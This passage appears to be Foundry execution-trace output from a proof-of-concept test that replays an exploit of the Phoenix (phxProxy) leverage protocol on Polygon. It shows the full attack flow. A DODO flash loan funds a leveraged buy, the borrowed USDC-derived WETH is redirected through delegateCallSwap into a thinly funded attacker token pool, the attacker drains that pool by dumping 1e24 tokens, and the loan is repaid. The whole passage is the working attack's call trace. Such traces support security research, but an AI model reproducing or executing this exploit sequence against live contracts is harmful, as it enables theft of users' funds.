    │   │   │   │   │   │   │   ├─ emit Borrow(param0: phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], param1: USDC: [0x2791Bca1f2de4661ED88A30C99A7a9449Aa84174], param2: 10236182401 [1.023e10], param3: 10241303053 [1.024e10])
    │   │   │   │   │   │   │   ├─ emit Interest(param0: phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], param1: USDC: [0x2791Bca1f2de4661ED88A30C99A7a9449Aa84174], param2: 5120652 [5.12e6])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x8de46fa0eb5b86b1323c66704d3dfcb9d9e3cc12893f0629b22ca85fd90aaa9d: 0x00000000000000000000000000000000000000000000000000000001dc5c3e00 → 0x000000000000000000000000000000000000000000000000000000043e7bfd81
    │   │   │   │   │   │   │   │   @ 0xed7b1bba9525bdd90b3ca74db15e0b546dea0609774e7fd7c0bd86cbaa9f417c: 0 → 0x00000000000000000000000000000000000000000000000000000002626de20d
    │   │   │   │   │   │   │   │   @ 3: 0x00000000000000000000000000000000000000000000000000000017f710269b → 0x00000000000000000000000000000000000000000000000000000017f75e4927
    │   │   │   │   │   │   │   └─ ← [Return] 10236182401 [1.023e10]
    │   │   │   │   │   │   └─ ← [Return] 10236182401 [1.023e10]
    │   │   │   │   │   ├─ [89899] 0x95620f30263ac0b0B4FFd9B7465838084e89cB84::swap(Router: [0xa5E0829CaCEd8fFDD4De3c43696c57F7D7A678ff], USDC: [0x2791Bca1f2de4661ED88A30C99A7a9449Aa84174], WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], 18228182401 [1.822e10]) [delegatecall]
    │   │   │   │   │   │   ├─ [3582] phxProxy::getSwapRoutingPath(USDC: [0x2791Bca1f2de4661ED88A30C99A7a9449Aa84174], WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619]) [staticcall]
    │   │   │   │   │   │   │   ├─ [2911] 0x6d68bEB09ea7e76d561EA8C4Aac34A6611dd9821::getSwapRoutingPath(USDC: [0x2791Bca1f2de4661ED88A30C99A7a9449Aa84174], WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ [80553] Router::swapExactTokensForTokens(18228182401 [1.822e10], 0, [0x2791Bca1f2de4661ED88A30C99A7a9449Aa84174, 0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], 1678185420 [1.678e9])
    │   │   │   │   │   │   │   ├─ [2504] 0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 1160872200883 [1.16e12], 741030499689304034041 [7.41e20], 1678185148 [1.678e9]
    │   │   │   │   │   │   │   ├─ [21409] USDC::transferFrom(phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], 0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d, 18228182401 [1.822e10])
    │   │   │   │   │   │   │   │   ├─ [20731] 0xDD9185DB084f5C4fFf3b4f70E7bA62123b812226::transferFrom(phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], 0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d, 18228182401 [1.822e10]) [delegatecall]
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], to: 0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d, value: 18228182401 [1.822e10])
    │   │   │   │   │   │   │   │   │   ├─ emit Approval(owner: phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], spender: Router: [0xa5E0829CaCEd8fFDD4De3c43696c57F7D7A678ff], value: 115792089237316195423570985008687907853269984665640564039457584007430124404328 [1.157e77])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0xdd1c2f5a832a3b1c780b5429158ddb789c898eec63e31875f49bac2c8ce01393: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffff93c920fbe9 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffff8f8aa4fe68
    │   │   │   │   │   │   │   │   │   │   @ 0x8de46fa0eb5b86b1323c66704d3dfcb9d9e3cc12893f0629b22ca85fd90aaa9d: 0x000000000000000000000000000000000000000000000000000000043e7bfd81 → 0
    │   │   │   │   │   │   │   │   │   │   @ 0x4e0a4827fcbc6067294395cb76e48f4ec8bf446ce26210bc37cd89c51f3b17db: 0x0000000000000000000000000000000000000000000000000000010e49600ab3 → 0x0000000000000000000000000000000000000000000000000000011287dc0834
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [46391] 0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d::swap(0, 11422047686641875070 [1.142e19], phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], 0x)
    │   │   │   │   │   │   │   │   ├─ [13238] WETH::transfer(phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], 11422047686641875070 [1.142e19])
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d, to: phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], value: 11422047686641875070 [1.142e19])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0x8de46fa0eb5b86b1323c66704d3dfcb9d9e3cc12893f0629b22ca85fd90aaa9d: 0x0000000000000000000000000000000000000000000000000000000019386d85 → 0x0000000000000000000000000000000000000000000000009e8343dad314e603
    │   │   │   │   │   │   │   │   │   │   @ 0x4e0a4827fcbc6067294395cb76e48f4ec8bf446ce26210bc37cd89c51f3b17db: 0x0000000000000000000000000000000000000000000000282bdd3151cf2e0af9 → 0x0000000000000000000000000000000000000000000000278d59ed771551927b
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─ [1222] USDC::balanceOf(0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d) [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [557] 0xDD9185DB084f5C4fFf3b4f70E7bA62123b812226::balanceOf(0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1179100383284 [1.179e12]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 1179100383284 [1.179e12]
    │   │   │   │   │   │   │   │   ├─ [608] WETH::balanceOf(0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 729608452002662158971 [7.296e20]
    │   │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 1179100383284 [1.179e12], reserve1: 729608452002662158971 [7.296e20])
    │   │   │   │   │   │   │   │   ├─ emit Swap(sender: Router: [0xa5E0829CaCEd8fFDD4De3c43696c57F7D7A678ff], amount0In: 18228182401 [1.822e10], amount1In: 0, amount0Out: 0, amount1Out: 11422047686641875070 [1.142e19], to: phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 8: 0x640712bc0000000000282bdd3151cf2e0af90000000000000000010e49600ab3 → 0x640713ae0000000000278d59ed771551927b0000000000000000011287dc0834
    │   │   │   │   │   │   │   │   │   @ 10: 0x000000000000000000000000000000000000299440e76bd2768901fcbd7e7ba6 → 0x00000000000000000000000000000000000029944743ae30fe87359912ebf074
    │   │   │   │   │   │   │   │   │   @ 9: 0x0000000000000000000000b362b662e44f005cc622bd6bf88bca0290a6725582 → 0x0000000000000000000000b362da5a81b1f908e6a2665ff4254b28aa0bfc8152
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   └─ ← [Return] [18228182401 [1.822e10], 11422047686641875070 [1.142e19]]
    │   │   │   │   │   │   ├─ emit Swap(param0: USDC: [0x2791Bca1f2de4661ED88A30C99A7a9449Aa84174], param1: WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], param2: 18228182401 [1.822e10], param3: 11422047686641875070 [1.142e19])
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000009e8343dab9dc787e
    │   │   │   │   │   ├─ [83575] 0x511436aD000920C61C9e910e73bE699A89E6517e::mint(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 404162632373123427687 [4.041e20])
    │   │   │   │   │   │   ├─ [78407] 0x27F8b62904bbf6409b3B269093336CdF5b2FA5F1::mint(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 404162632373123427687 [4.041e20]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 404162632373123427687 [4.041e20])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x6e1540171b6c0c960b71a7020d9f60077f6af931a8bbf590da0223dacf75c7b4: 0 → 0x000000000000000000000000000000000000000000000015e8e21ccc46d02d67
    │   │   │   │   │   │   │   │   @ 0x8b5848f6c9725c5dd6a62384a50274e07ea02403cad9d85e689c9bf62a69b072: 0 → 0x000000000000000000000000000000000000000000000015e8e21ccc46d02d67
    │   │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000000000000000640713ae
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ emit BuyLeverage(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: USDC: [0x2791Bca1f2de4661ED88A30C99A7a9449Aa84174], param2: 8000000000 [8e9], param3: 404162632373123427687 [4.041e20], param4: 1977421800 [1.977e9])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x8b5848f6c9725c5dd6a62384a50274e07ea02403cad9d85e689c9bf62a69b072: 0 → 0x000000000000000000000000000000000000000000000015e8e21ccc46d02d67
    │   │   │   │   │   │   @ 0x8de46fa0eb5b86b1323c66704d3dfcb9d9e3cc12893f0629b22ca85fd90aaa9d: 0x00000000000000000000000000000000000000000000000000000001dc5c3e00 → 0x000000000000000000000000000000000000000000000000000000043e7bfd81
    │   │   │   │   │   │   @ 18: 0x0000000000000000000000000000000000000000000000000000001d8e25e620 → 0x000000000000000000000000000000000000000000000000000000247faf0840
    │   │   │   │   │   │   @ 0x66ea8bc9e2ef35f01ea6670ecf02bf5ea8ac61dd4ecdfe8ce8b62e3189023be1: 0x000000000000000000000000000000000000000000000000000000000abe8d22 → 0x000000000000000000000000000000000000000000000000000000000b389f22
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─ [608] WETH::balanceOf(phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de]) [staticcall]
    │   │   │   │   └─ ← [Return] 11422047687065003523 [1.142e19]
    │   │   │   ├─ [87910] phxProxy::delegateCallSwap(0xa9678a18000000000000000000000000a5e0829caced8ffdd4de3c43696c57f7d7a678ff0000000000000000000000007ceb23fd6bc0add59e62ac25578270cff1b9f6190000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f0000000000000000000000000000000000000000000000009e8343dad314e603)
    │   │   │   │   ├─ [87206] 0x6d68bEB09ea7e76d561EA8C4Aac34A6611dd9821::delegateCallSwap(0xa9678a18000000000000000000000000a5e0829caced8ffdd4de3c43696c57f7d7a678ff0000000000000000000000007ceb23fd6bc0add59e62ac25578270cff1b9f6190000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f0000000000000000000000000000000000000000000000009e8343dad314e603) [delegatecall]
    │   │   │   │   │   ├─ [85308] 0x95620f30263ac0b0B4FFd9B7465838084e89cB84::swap(Router: [0xa5E0829CaCEd8fFDD4De3c43696c57F7D7A678ff], WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], SHITCOIN: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 11422047687065003523 [1.142e19]) [delegatecall]
    │   │   │   │   │   │   ├─ [3582] phxProxy::getSwapRoutingPath(WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], SHITCOIN: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   │   │   │   │   ├─ [2911] 0x6d68bEB09ea7e76d561EA8C4Aac34A6611dd9821::getSwapRoutingPath(WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], SHITCOIN: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ [75962] Router::swapExactTokensForTokens(11422047687065003523 [1.142e19], 0, [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619, 0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], 1678185420 [1.678e9])
    │   │   │   │   │   │   │   ├─ [504] 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 7000000000000000 [7e15], 7000000000000000 [7e15], 1678185390 [1.678e9]
    │   │   │   │   │   │   │   ├─ [11249] WETH::transferFrom(phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b, 11422047687065003523 [1.142e19])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], to: 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b, value: 11422047687065003523 [1.142e19])
    │   │   │   │   │   │   │   │   ├─ emit Approval(owner: phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], spender: Router: [0xa5E0829CaCEd8fFDD4De3c43696c57F7D7A678ff], value: 115792089237316195423570985008687907853269984665640564039294205116178404082601 [1.157e77])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xdd1c2f5a832a3b1c780b5429158ddb789c898eec63e31875f49bac2c8ce01393: 0xfffffffffffffffffffffffffffffffffffffffffffffff7c32cd770c5c2e9ac → 0xfffffffffffffffffffffffffffffffffffffffffffffff724a99395f2ae03a9
    │   │   │   │   │   │   │   │   │   @ 0x0cd3a2dc7d1f0c4ada18d59da33fded3c01d2190b51dc6214aad3b189545db8c: 0x0000000000000000000000000000000000000000000000000018de76816d8000 → 0x0000000000000000000000000000000000000000000000009e9c225154826603
    │   │   │   │   │   │   │   │   │   @ 0x8de46fa0eb5b86b1323c66704d3dfcb9d9e3cc12893f0629b22ca85fd90aaa9d: 0x0000000000000000000000000000000000000000000000009e8343dad314e603 → 0
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [56390] 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b::swap(6995699785922988 [6.995e15], 0, phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], 0x)
    │   │   │   │   │   │   │   │   ├─ [25751] SHITCOIN::transfer(phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], 6995699785922988 [6.995e15])
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b, to: phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], value: 6995699785922988 [6.995e15])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0x7057cbfca1e4cbcdaf3e0aac2e2cc32512780c54f13e7aaec0226799379d8355: 0 → 0x0000000000000000000000000000000000000000000000000018da8d48b1f9ac
    │   │   │   │   │   │   │   │   │   │   @ 0x6bca66f416481ad289c673d7ed77c205052948a365bacc055bf4d86d20c16b48: 0x0000000000000000000000000000000000000000000000000018de76816d8000 → 0x000000000000000000000000000000000000000000000000000003e938bb8654
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─ [824] SHITCOIN::balanceOf(0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 4300214077012 [4.3e12]
    │   │   │   │   │   │   │   │   ├─ [608] WETH::balanceOf(0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 11429047687065003523 [1.142e19]
    │   │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 4300214077012 [4.3e12], reserve1: 11429047687065003523 [1.142e19])
    │   │   │   │   │   │   │   │   ├─ emit Swap(sender: Router: [0xa5E0829CaCEd8fFDD4De3c43696c57F7D7A678ff], amount0In: 0, amount1In: 11422047687065003523 [1.142e19], amount0Out: 6995699785922988 [6.995e15], amount1Out: 0, to: phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 8: 0x640713ae0000000000000018de76816d80000000000000000018de76816d8000 → 0x640713ae0000000000009e9c225154826603000000000000000003e938bb8654
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   └─ ← [Return] [11422047687065003523 [1.142e19], 6995699785922988 [6.995e15]]
    │   │   │   │   │   │   ├─ emit Swap(param0: WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], param1: SHITCOIN: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], param2: 11422047687065003523 [1.142e19], param3: 6995699785922988 [6.995e15])
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000018da8d48b1f9ac
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000018da8d48b1f9ac
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000018da8d48b1f9ac
    │   │   │   ├─ [91247] Router::swapExactTokensForTokens(1000000000000000000000000 [1e24], 0, [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f, 0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619, 0x2791Bca1f2de4661ED88A30C99A7a9449Aa84174], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1678185390 [1.678e9])
    │   │   │   │   ├─ [504] 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4300214077012 [4.3e12], 11429047687065003523 [1.142e19], 1678185390 [1.678e9]
    │   │   │   │   ├─ [504] 0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 1179100383284 [1.179e12], 729608452002662158971 [7.296e20], 1678185390 [1.678e9]
    │   │   │   │   ├─ [4633] SHITCOIN::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b, 1000000000000000000000000 [1e24])
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b, value: 1000000000000000000000000 [1e24])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000013da3299d54edf0128000 → 0x0000000000000000000000000000000000000000000069e10dce88004f128000
    │   │   │   │   │   │   @ 0x6bca66f416481ad289c673d7ed77c205052948a365bacc055bf4d86d20c16b48: 0x000000000000000000000000000000000000000000000000000003e938bb8654 → 0x00000000000000000000000000000000000000000000d3c21bced0d6d9bb8654
    │   │   │   │   │   │   @ 0x5a81487ee36dd29474ce7e17974478ea93a8e0120266ad4e0bc09406b69cec2c: 0xffffffffffffffffffffffffffffffffffffffffffffffffffe721897e927fff → 0xffffffffffffffffffffffffffffffffffffffffffff2c3de418549bdd927fff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [34277] 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b::swap(0, 11429047687015708285 [1.142e19], 0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d, 0x)
    │   │   │   │   │   ├─ [3638] WETH::transfer(0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d, 11429047687015708285 [1.142e19])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b, to: 0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d, value: 11429047687015708285 [1.142e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x0cd3a2dc7d1f0c4ada18d59da33fded3c01d2190b51dc6214aad3b189545db8c: 0x0000000000000000000000000000000000000000000000009e9c225154826603 → 0x0000000000000000000000000000000000000000000000000000000002f02f86
    │   │   │   │   │   │   │   @ 0x4e0a4827fcbc6067294395cb76e48f4ec8bf446ce26210bc37cd89c51f3b17db: 0x0000000000000000000000000000000000000000000000278d59ed771551927b → 0x0000000000000000000000000000000000000000000000282bf60fc866e3c8f8
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [824] SHITCOIN::balanceOf(0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1000000000004300214077012 [1e24]
    │   │   │   │   │   ├─ [608] WETH::balanceOf(0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 49295238 [4.929e7]
    │   │   │   │   │   ├─ emit Sync(reserve0: 1000000000004300214077012 [1e24], reserve1: 49295238 [4.929e7])
    │   │   │   │   │   ├─ emit Swap(sender: Router: [0xa5E0829CaCEd8fFDD4De3c43696c57F7D7A678ff], amount0In: 1000000000000000000000000 [1e24], amount1In: 0, amount0Out: 0, amount1Out: 11429047687015708285 [1.142e19], to: 0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x640713ae0000000000009e9c225154826603000000000000000003e938bb8654 → 0x640713ae0000000000000000000002f02f8600000000d3c21bced0d6d9bb8654
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [38581] 0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d::swap(18131590116 [1.813e10], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   ├─ [24644] USDC::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 18131590116 [1.813e10])
    │   │   │   │   │   │   ├─ [23973] 0xDD9185DB084f5C4fFf3b4f70E7bA62123b812226::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 18131590116 [1.813e10]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 18131590116 [1.813e10])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000000000000000438ba1be4
    │   │   │   │   │   │   │   │   @ 0x4e0a4827fcbc6067294395cb76e48f4ec8bf446ce26210bc37cd89c51f3b17db: 0x0000000000000000000000000000000000000000000000000000011287dc0834 → 0x0000000000000000000000000000000000000000000000000000010e4f21ec50
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [1222] USDC::balanceOf(0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d) [staticcall]
    │   │   │   │   │   │   ├─ [557] 0xDD9185DB084f5C4fFf3b4f70E7bA62123b812226::balanceOf(0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 1160968793168 [1.16e12]
    │   │   │   │   │   │   └─ ← [Return] 1160968793168 [1.16e12]
    │   │   │   │   │   ├─ [608] WETH::balanceOf(0x853Ee4b2A13f8a742d64C8F088bE7bA2131f670d) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 741037499689677867256 [7.41e20]
    │   │   │   │   │   ├─ emit Sync(reserve0: 1160968793168 [1.16e12], reserve1: 741037499689677867256 [7.41e20])
    │   │   │   │   │   ├─ emit Swap(sender: Router: [0xa5E0829CaCEd8fFDD4De3c43696c57F7D7A678ff], amount0In: 0, amount1In: 11429047687015708285 [1.142e19], amount0Out: 18131590116 [1.813e10], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x640713ae0000000000278d59ed771551927b0000000000000000011287dc0834 → 0x640713ae0000000000282bf60fc866e3c8f80000000000000000010e4f21ec50
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return] [1000000000000000000000000 [1e24], 11429047687015708285 [1.142e19], 18131590116 [1.813e10]]
    │   │   │   ├─ [4744] USDC::transfer(dodo: [0x1093ceD81987Bf532c2b7907B2A8525cd0C17295], 8000000000 [8e9])
    │   │   │   │   ├─ [4073] 0xDD9185DB084f5C4fFf3b4f70E7bA62123b812226::transfer(dodo: [0x1093ceD81987Bf532c2b7907B2A8525cd0C17295], 8000000000 [8e9]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: dodo: [0x1093ceD81987Bf532c2b7907B2A8525cd0C17295], value: 8000000000 [8e9])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x8974174c7f2e07c44ab2f2c73be7a9272455f23eb1885f7cfe3d0b7763ab92c9: 0x0000000000000000000000000000000000000000000000000000001186b15215 → 0x000000000000000000000000000000000000000000000000000000136387a215
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000000000000438ba1be4 → 0x000000000000000000000000000000000000000000000000000000025be3cbe4
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 2: 1 → 0
    │   │   │   │   @ 0x853e913a5faa9c25b589268edc473da98668d0ca49ae1c63032bb0cd322d1fcd: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   @ 12: 0 → 1
    │   │   │   └─ ← [Stop]
    │   │   ├─ [2564] 0x0d500B1d8E8eF31E21C99d1Db9A6444d3ADf1270::balanceOf(dodo: [0x1093ceD81987Bf532c2b7907B2A8525cd0C17295]) [staticcall]
    │   │   │   └─ ← [Return] 76565326917832887149484 [7.656e22]
    │   │   ├─ [1222] USDC::balanceOf(dodo: [0x1093ceD81987Bf532c2b7907B2A8525cd0C17295]) [staticcall]
    │   │   │   ├─ [557] 0xDD9185DB084f5C4fFf3b4f70E7bA62123b812226::balanceOf(dodo: [0x1093ceD81987Bf532c2b7907B2A8525cd0C17295]) [delegatecall]
    │   │   │   │   └─ ← [Return] 83274211861 [8.327e10]
    │   │   │   └─ ← [Return] 83274211861 [8.327e10]
    │   │   ├─ [564] 0x0d500B1d8E8eF31E21C99d1Db9A6444d3ADf1270::balanceOf(dodo: [0x1093ceD81987Bf532c2b7907B2A8525cd0C17295]) [staticcall]
    │   │   │   └─ ← [Return] 76565326917832887149484 [7.656e22]
    │   │   ├─ [1222] USDC::balanceOf(dodo: [0x1093ceD81987Bf532c2b7907B2A8525cd0C17295]) [staticcall]
    │   │   │   ├─ [557] 0xDD9185DB084f5C4fFf3b4f70E7bA62123b812226::balanceOf(dodo: [0x1093ceD81987Bf532c2b7907B2A8525cd0C17295]) [delegatecall]
    │   │   │   │   └─ ← [Return] 83274211861 [8.327e10]
    │   │   │   └─ ← [Return] 83274211861 [8.327e10]
